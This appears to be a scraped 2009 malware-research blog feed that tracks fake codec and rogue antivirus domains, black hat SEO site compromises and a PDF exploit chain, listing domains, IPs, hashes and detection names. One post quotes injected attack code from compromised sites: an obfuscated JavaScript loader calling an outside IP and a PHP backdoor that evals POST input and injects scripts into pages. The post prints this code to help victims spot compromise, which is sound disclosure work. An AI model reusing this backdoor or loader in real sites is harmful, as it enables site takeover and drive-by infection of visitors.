style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1224" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">tubeloyaln.com Fake Codec and Rogue Antivirus revisited</span><br /><br /><br /> The previous page which include 14 domain (10 active) is <a href="http://malware-web-threats.blogspot.com/2009/03/loyaldown-loyaltube-fake-codec-and.html" target="_blank">here</a><br />
</p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p><u>Fake codec and fake scanner page</u>:<br /><br />hxxp://tubeloyaln.com/scan/?id=..<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /><br />hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijk1EMuFqJreL_cghnWZa_NkHPIokvwcmNoPRRA0gxrKjvKUQ6phJfqLeSHkEA6nVU9PekFMtmKBBIs2wp4rSklG2UzW09zLsDPsJiuoW2h13xQRmI3JvOSGlSiJSQaywq0Avg6bFgu6pY/s1600-h/tubeloyaln.com-fake-codec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 290px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijk1EMuFqJreL_cghnWZa_NkHPIokvwcmNoPRRA0gxrKjvKUQ6phJfqLeSHkEA6nVU9PekFMtmKBBIs2wp4rSklG2UzW09zLsDPsJiuoW2h13xQRmI3JvOSGlSiJSQaywq0Avg6bFgu6pY/s320/tubeloyaln.com-fake-codec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321062064246878866" /></a> <br /><br /><span class="scam_website">win-pc-defender.com</span><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZaFdV5m52XBn8olxg1iW-tfAkga6DRzx0FyBTkRlmYQXPbxsZf07noTYwy39QoFW9cKMRkEdfkeXPFPYRYL1iJLUFDJpGjmu-JxjzTQe9hGnO0naXnEkJGSFjFON6hNS-gl7yMShSRqd/s1600-h/win-pc-defender.com.jpg"><img style="cursor:pointer; cursor:hand;width: 273px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZaFdV5m52XBn8olxg1iW-tfAkga6DRzx0FyBTkRlmYQXPbxsZf07noTYwy39QoFW9cKMRkEdfkeXPFPYRYL1iJLUFDJpGjmu-JxjzTQe9hGnO0naXnEkJGSFjFON6hNS-gl7yMShSRqd/s320/win-pc-defender.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321067351277614082" /></a> <br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/27da52a50d8e8cf3213ef96a970cd4bd" target="_blank"> VirusTotal</a>: 14/40<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><br />File size: 71680 bytes<br />MD5...: ac10a8c9d0e7508beafa6f61c1af44bc<br /><br />Alias: <span style="color:#FF0000">Win32/Insebro.A</span> - <span style="color:#FF0000">Adware.WinPCDefender</span><br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/cec611a2cd7a184f6dba817eb89d8e01" target="_blank">VirusTotal</a>: 10/39<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=6C641AEF0030F4099A9C0F52D23B6300ECE58BEC" target="_blank">Prevx</a><br /><br />File size: 1022464 bytes<br />MD5...: 34e1cd77554c06f9d24a6857f702b4fd<br /><br />Alias: <span style="color:#FF0000">FakeAlert.IM</span> -<span style="color:#FF0000"> Win32/FakeRean</span> - <span style="color:#FF0000">WinPCDefender</span><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">ThreatExpert</a> (other file)<br />Fraudulent payment system: hxxp://billingpayment.net/pp/?id= <br /><br /><span class="scam_website">winpcdown09.com<br />winpcdown99.com</span><br /><br /><a href="http://www.virustotal.com/analisis/c599f082cd2330a526afb9aaf2e0d15f" target="_blank">VirusTotal</a>: 21/40<br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=C5F95F4000E8ED498008012DDDE82A008FF2688D" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=17eb2259b3146e8747922d55cd0d51d8a" target="_blank">Anubis </a><br /><br />File size: 98304 bytes<br />MD5...: d15e5bb28d5e4c31651efb32e000397f<br /><br />Alias: <span style="color:#FF0000">Trojan:Win32/Alureon</span> - <span style="color:#FF0000">Win32.Tdss</span> - <span style="color:#FF0000">DNSChanger.r</span><br /><br />Associated website: <br /><br />trafficstatic.com [92.48.91.144]<br />statsanalist.cn [72.233.114.126]<br />livefind1blogging.com [72.233.115.169]<br /><br /></p><p>The new list is as follow (including sub-domains):<br /><br /><span class="scam_website">iloveyourbrain.com<br />loyal-tube.com<br />loyaldown99.com<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com<br />rakompoporyadkunazaryadku.com<br />ruler-domains.com<br />setupdatdownload.com<br />tube-loyal.com<br />tubeloyal.com<br />tubeloyaln.com<br />billingpayment.netcodecs.tubeloyaln.com <br />lamer.tubeloyaln.com <br />videosz.tubeloyaln.com<br />wedare.tubeloyaln.com<br />velzevuladmin.com <br />win-pc-defender.com<br />winpcdown09.com<br />winpcdown99.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br />xp-police.com<br />gofuckbiz.xp-police.com <br />lamer.xp-police.com <br />suckmydick.xp-police.com<br />rulerteam.xp-police.com<br />sigurd.xp-police.com</span><br /><br />DNS:<br /><br /><span class="scam_website">ns1.loyaltube10.com<br />ns1.tube-loyal.com<br />ns1.tubeloyal.com<br />ns1.winpcdown09.com<br />ns1.winpcdown99.com<br />ns1.xp-police.com<br />ns2.loyaltube10.com<br />ns2.tube-loyal.com<br />ns2.tubeloyal.com<br />ns2.winpcdown09.com<br />ns2.winpcdown99.com<br />ns2.xp-police.com<br />ns3.xp-police.com<br />ns4.xp-police.com<br />ns5.xp-police.com</span><br /><br />IP: 213.163.65.10<br />Reverse: mail.l1ght.net<br />Route: 213.163.64.0/19<br />AS:AS20495 - WEDARE We Dare BV Autonomous System<br /><br /><br /></p></td></tr> <tr> <td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td> </tr> <tr> <td width="25" height="208" valign="top"><br /></td> <td width="547"><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyaln.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://wincodecupdate.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107010 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">e66fb67721bcb6a6b47879e451ce905b</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/639b3f0ab92bf9fcbea9c6dd6d9eb43a" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=1dae68d4e19b12db48995ce91fe940de0" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">04.05.2009 06:39:41 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/40 (15%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">FakeAlert.IR</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td> </tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Network graph</b></td></tr><tr><td height="208" valign="top"><br /></td><td><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkDxH7rZE432dsXjFtZgvp5i9jpIoYhBba4SSCsvAsA5MQovLJStP1pvRfOrrnMAqD59jiDadgT8N7OGbC0TCPyRT7rVaDciV0fvZLuA8Saw-ZQ9PxCi4PEC_QEpPU_NRneupCTefmvbry/s1600-h/tubeloyaln.com-fake-codec-213.163.65.10.jpg"><img style="cursor:pointer; cursor:hand;width: 82px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkDxH7rZE432dsXjFtZgvp5i9jpIoYhBba4SSCsvAsA5MQovLJStP1pvRfOrrnMAqD59jiDadgT8N7OGbC0TCPyRT7rVaDciV0fvZLuA8Saw-ZQ9PxCi4PEC_QEpPU_NRneupCTefmvbry/s320/tubeloyaln.com-fake-codec-213.163.65.10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321077363584002754" /></a><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-64446202410462962272009-04-03T11:28:00.000-07:002009-04-19T17:00:56.872-07:00Black Hat SEO and Rogue Antivirus p.5<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO planting trojans</span> <br /><br /> Full of hacks<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><br /><br />Follow this page for desinfection: <a href="http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html" target="_blank">Malware Manipulating Google SERPs</a> (from blog.scansafe.com)<p> After promoting some spyware and other rogue security software, now this is another list of compromised websites all with obfuscated javascript code inserted which result in:<br /> <br /> hxxp://94.247.2.195/news/?id=100<br /> (<a href="http://jsunpack.jeek.org/dec/go?url=94.247.2.195_news__id=100" target="_blank">Analysis</a>) <br /> <br /> which call <br /> <br /> hxxp://94.247.2.195/news/?id=2<br /> <br /> and download a PDF with a random name QRB.pdf, WXk.pdf ...<br /> <br /> File size: 10417 bytes<br /> MD5: af28f3bc9424a3da7ff8bc84740bce93 <br /> <br /> <a href="http://www.virustotal.com/analisis/6a54baeba7d05c80bc4316ad3b294f86" target="_blank">VirusTotal Analysis</a>: 0/40 (0%)<br /> <br /> when running it load <br /> <br /> hxxp://94.247.2.195/news/?id=10&<br /> <br /> With an Adobe Collab overflow (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a>) <br /> <a href="http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s1600-h/PDF1.jpg"><img style="cursor:pointer; cursor:hand;width: 223px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s320/PDF1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534507554408930" /></a><br /> <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPR7aRJzhxPXlAXQ1B4RehxMdOCBUW7TJ-j201dNtGI59x4ajhgu4T3UbXswoBql34KUWrCNXq4Zo91WpcAIkZqii8_E1A1y4fmtPi7c_MxrHE2N28s4A5QHGRftnRuedkl1I8zYG_0rcl/s1600-h/PDF2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPR7aRJzhxPXlAXQ1B4RehxMdOCBUW7TJ-j201dNtGI59x4ajhgu4T3UbXswoBql34KUWrCNXq4Zo91WpcAIkZqii8_E1A1y4fmtPi7c_MxrHE2N28s4A5QHGRftnRuedkl1I8zYG_0rcl/s320/PDF2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534511430819394" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s1600-h/PDF1.jpg"></a><br /> <br />which lead to an executable beeing downloaded and executed.<br />
Also with a random name PO.exe, 8lv.exe ...<br /> <br /> File Size: 15360 Bytes <br /> MD5: 791509d03706cbc8883536b5131341d4<br /> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html" target="_blank">Anubis Report</a><br /> <br /> <a href="http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a" target="_blank">VirusTotal Analysis</a>: 10/40 (25%)<br /> <br /> a-squared - Trojan-Spy.Agent!IK <br /> Avast - Win32.Daonol-L<br /> eSafe - Suspicious File <br /> GData - Win32:KillAV-KS <br /> Irakus - Trojan-Spy.Agent<br /> Kaspersky - Backdoor.Win32.Agent.afhg<br /> McAfee+Artemis - Generic!Artemis<br /> Prevx1 - High Risk Cloaked Malware<br /> Sophos - Mal/Generic-A<br /> TrendMicro - PAK_Generic.001 <br /><br /> First received on 04.03.2009 18:36:21 (CET) <br /> <br /> Ikarus: Trojan-Spy.Agent (Sig-Id:975847) <br /> <br /> <a href="http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4" target="_blank">ThreatExpert Report</a><br /> <a href="http://info.prevx.com/aboutprogramtext.asp?PX5=553B1FA200AA99603C6800E34911BA008604CE7A" target="_blank">Prevx</a><br /> <br /> Source:<br /> <br /> <a href="http://discussion.dreamhost.com/showthreaded.pl?Cat=&Board=forum_troubleshooting&Number=117798&page=4&view=expanded&sb=6&o=14&vc=1" target="_blank">dreamhost.com discussion</a><br /> <a href="http://www.dynamicdrive.com/forums/showthread.php?p=191051" target="_blank">dynamicdrive.com forum</a><br /> <a href="http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html" target="_blank">windowsbbs.com forum</a> <br /> <a href="http://www.spywarewarrior.com/viewtopic.php?t=30508" target="_blank">spywarewarrior.com forum</a> <br /> <a href="http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=10478" target="_blank">who-is-who-in-gpt.com</a> <br /> <a href="http://www.tcheval.net/forum/s3071-regle-tcheval-net-victime-hack.html" target="_blank">tcheval.net forum (FR)</a><br /><hr /> Also interesting on this IP is this script:<br /> <br /> If you have this code in your site, you are probably on of these victims. <br />Change all your passwords, including FTP, emails etc. On all your accounts.<br /> <br /> 94.247.2.195/jquery.js <br /> or<br /> 78.110.175.249/jquery.js (not responding) in Russia<br /> <br />descr: LIMIT SUREHOST - AAS188-RIPE - @ukservers.com<br />person: Alexander A Solovyov - @limt.ru<br />LIMT Group Ltd. has zero web presence, apart from SPAM, hacking and other problems.<br />They are clearly a bogus company. Clear evidence of criminal fraud. "Same for LIMIT SUREHOST"<br /><br />route: 78.110.160.0/20 - UK Dedicated Servers Limited - AS42831 - UKSERVERS-MNT<br /> <br /> Javascript code:<br /> <br /> <script language=javascript><br /> document.write(unescape('<br /> %3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6<br /> 1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz<br /> AnczAnrHY8iprLtzAn%3E<br /> ').<br /> replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));<br /> </script> <br /><br /> Script found on compromised websites all for the benefit of the<br /> infamous <a href="http://en.wikipedia.org/wiki/Russian_Business_Network" target="_blank">Russian Business Network</a> (RBN).<br /><br /> PHP code injected<br /><br /><?php <br />if (!function_exists('tmp_lkojfghx')) { <br />for ($i = 1; $i < 10; $i++) <br />if (is_file($f = '/tmp/m' . $i)) { <br />include_once($f); <br />break; <br />} <br />if (isset($_POST['tmp_lkojfghx3'])) <br />eval($_POST['tmp_lkojfghx3']); <br />if (!defined('TMP_XHGFJOKL')) <br />define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5<br />ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaX<br />RlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFM<br />wcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcm<br />M2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdW<br />VyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzB<br />TMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfE<br />lpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3Jp<br />cHQ+')); <br />function tmp_lkojfghx($s) <br />{ <br />if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b')) <br />$s = gzinflate(substr($s, 10, -8)); <br />if (preg_match_all('#<script(.*?)</script>#is', $s, $a)) <br />foreach ($a[0] as $v) <br />if (count(explode("\n", $v)) > 5) { <br />$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)<br />|| preg_match('#[\(\[](\s*\d+,){20,}#', $v); <br />if ((preg_match('#\beval\b#', $v) &&<br /> ($e || strpos($v, 'fromCharCode'))) ||<br />($e && strpos($v, 'document.write'))) <br />$s = str_replace($v, '', $s); <br />} <br />$s1 = preg_replace('#<script language=javascript><br /><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s); <br />if (stristr($s, '<body')) <br />$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1); <br />elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>')) <br />$s = $s1 . TMP_XHGFJOKL; <br />return $g ? gzencode($s) : $s; <br />} <br />function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0) <br />{ <br />$s = array(); <br />if ($b && $GLOBALS['tmp_xhgfjokl']) <br />call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d); <br />foreach (@ob_get_status(1) as $v) <br />if (($a = $v['name']) == 'tmp_lkojfghx') <br />return; <br />else <br />$s[] = array($a == 'default output handler' ? false : $a); <br />for ($i = count($s) - 1; $i >= 0; $i--) { <br />$s[$i][1] = ob_get_contents(); <br />ob_end_clean(); <br />} <br />ob_start('tmp_lkojfghx'); <br />for ($i = 0; $i < count($s); $i++) { <br />ob_start($s[$i][0]); <br />echo $s[$i][1]; <br />} <br />} <br />} <br />if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2') <br />$GLOBALS['tmp_xhgfjokl'] = $a; <br />tmp_lkojfghx2(); <br />?> <br /><br />with colors:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTkZtWEP6_gg1iMICkg7c9coiJRyOt6t9rO944Vc0XAeiENw_GyXv_7BFkMqZzAwWF06mCHCUMEe-8J9WHP3KThnJKukqAWpJ9tHSAAZI-AI06AQ9nMf1HYH82HDdA8sLRGRNgmsXBv8J/s1600-h/php-code-injected.jpg"><img style="cursor:pointer; cursor:hand;width: 166px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTkZtWEP6_gg1iMICkg7c9coiJRyOt6t9rO944Vc0XAeiENw_GyXv_7BFkMqZzAwWF06mCHCUMEe-8J9WHP3KThnJKukqAWpJ9tHSAAZI-AI06AQ9nMf1HYH82HDdA8sLRGRNgmsXBv8J/s320/php-code-injected.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320533877827604178" /></a><br /><br /><a href="http://www.google.com/search?hl=en&q=%22tmp_lkojfghx%22" target="_blank">Google search</a><br /> <br /> <br /><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-63017202674523978662009-04-03T03:37:00.000-07:002009-04-03T04:00:16.811-07:00Black Hat SEO and Rogue Antivirus p.6<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span> <br /><br />Analyzing the tactic<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> Yet another WinWebSecurity variant this one through crack/serial websites and ad network <br /><br />Fake ad:<br /><i>BE PROTECTED! - FREE online system scan for viruses, trojans and malware. <br />Check it out - maybe someone have access to your PC right now! Protect yourself.</i><br /><br />Which result in a complete set of redirection<br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=8bd407705e77d4149c2d8eeeb4a90624&t=1238754157&type=js" target="_blank">Redirection 1</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=be40e167ad6c26b527ee75aad00e64fe&t=1238754213&type=js" target="_blank">Redirection 2</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=90186e983d193ade0128afc248ea596b&t=1238754257&type=js" target="_blank">Redirection 3</a> <br /><a href="http://wepawet.iseclab.org/view.php?hash=c6f5e7d7eeb0ffcc39f9084a69220f37&t=1238754295&type=js" target="_blank">Redirection 4</a><br /><br />then<br /><br />initialsecurityscan.com<br /><br />Retreived from google cache <a href="http://209.85.229.132/search?q=cache:6dAQ_gk8K8kJ:filecourse.net/file-search-tube%2B8porno-1-full-version-with-crack-rapidshare-links.html+%22Check+it+out+-+maybe+someone+have+access+to+your+PC%22&cd=10&hl=en&ct=clnk" target="_blank">here</a><br /><br /><a href="http://www.virustotal.com/analisis/435fe8b2c2efcc6c268cf922927722d7" target="_blank">VirusTotal</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=27C85C042834ACA4A88A01B1F2D26C00E41566C1" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=18bd3ce55e3d94044d936bf1956b3e506" target="_blank">Anubis</a><br /><br />File install.exe received on 04.03.2009 12:28:53 (CET)<br />Result: 18/39 (46.16%) <br /><br />File info:<br /><br />File size: 108584 bytes<br />MD5: de926b63ab0976244d752170dac7ec00 <br /><br /><u>Hosted by Netelligent Hosting Services Inc</u> on the IP 209.44.126.14<br /><br /></p><p>Screenshot on Friday April 3<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV5vLw9IvT1iT6JcKzjFxSvjsPrZVrNCNLZFD3zKRH01MGMOor_VOnRUMReUbtSczfhnqmk1XY5lQxiYDm_0qjlmcvx4c463CXq4t5sT6CKkDa7A348uwg9OnfVoL0tgW8mchZudeHb_rv/s1600-h/initialsecurityscan.com-ad-SCAM.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 231px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV5vLw9IvT1iT6JcKzjFxSvjsPrZVrNCNLZFD3zKRH01MGMOor_VOnRUMReUbtSczfhnqmk1XY5lQxiYDm_0qjlmcvx4c463CXq4t5sT6CKkDa7A348uwg9OnfVoL0tgW8mchZudeHb_rv/s320/initialsecurityscan.com-ad-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320414093422583090" /></a><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPNv0F1iZGu5fkcVWVgxSSk_ermXd3oN6Am64t4AR8KSswOT3t4ArJKO_-GOqkb__PBSakF9A7H8KuWAeZ3AMHgyyN9jT-YQdPtDracXDMke_OWGZiTnhRvWKvdwxP0gOYIUgxT68fcPDb/s1600-h/initialsecurityscan.com-SCAM.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 202px;" 